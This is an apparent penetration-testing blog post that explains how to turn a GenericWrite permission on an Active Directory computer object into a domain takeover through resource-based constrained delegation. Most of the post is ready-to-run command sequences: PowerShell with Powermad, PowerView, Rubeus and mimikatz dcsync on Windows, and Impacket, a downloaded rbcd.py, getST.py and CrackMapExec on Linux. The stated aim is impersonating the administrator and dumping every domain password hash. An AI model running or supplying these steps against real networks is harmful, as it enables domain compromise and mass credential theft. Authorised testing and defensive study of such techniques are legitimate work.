Exploiting Genericwrite

Another way to exploit “GenericWrite” ACL’s

From BloodHound: “GenericWrite to a computer object can be used to perform a resource based constrained delegation attack. Abusing this primitive is currently only possible through the Rubeus project. First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account”

BloodHound, as well as every blog post I could find on this subject specifies using CIFS to read the C$ drive on the target. In my case I needed to exploit a Domain Controller and dump password hashes. This post will show two ways to exploit this, one from Windows and another from Linux.

From Windows in PowerShell:

New-MachineAccount -MachineAccount newcomputer -Password $(ConvertTo-SecureString 'Password12345' -AsPlainText -Force) 
$ComputerSid = Get-DomainComputer newcomputer -Properties objectsid | Select -Expand objectsid 
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 
$SDBytes = New-Object byte[] ($SD.BinaryLength) 
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <fqdn> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 
.\Rubeus.exe s4u /user:newcomputer$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:ADMINISTRATOR /msdsspn:LDAP/<fqdn> /ptt 
lsadump::dcsync /dc:<dc fqdn> /domain:<domain> /all /csv

From Linux:

This attack requires a different version of rbcd.py than the one that comes with Impacket. Get it from https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py

Add a computer:

impacket-addcomputer -computer-name 'newcomputer$' -computer-pass Password12345 -dc-ip [DC IP] [domain]/[username]:[password]

Modifying delegation rights:

python3 rbcd.py -f newcomputer -t <target computer> -dc-ip [DC IP] -hashes :<NT Hash> <domain>\\<user>

Getting the impersonated service ticket. If you follow the instructions from the BloodHound “Abuse info”, it tells you to use ‘cifs’. However, since we want to dump NTDS from the domain controller, we use ‘ldap’ in this case.

getST.py -spn ldap/<domain> -impersonate administrator -dc-ip [DC IP] <domain>/newcomputer$:Password12345

After adding the file path to the KRB5CCNAME variable the ticket is usable for Kerberos clients.

export KRB5CCNAME=$(pwd)/administrator.ccache

Run Secretsdump or CrackMapExec:

cme smb <target> -k --ntds
Written on September 8, 2022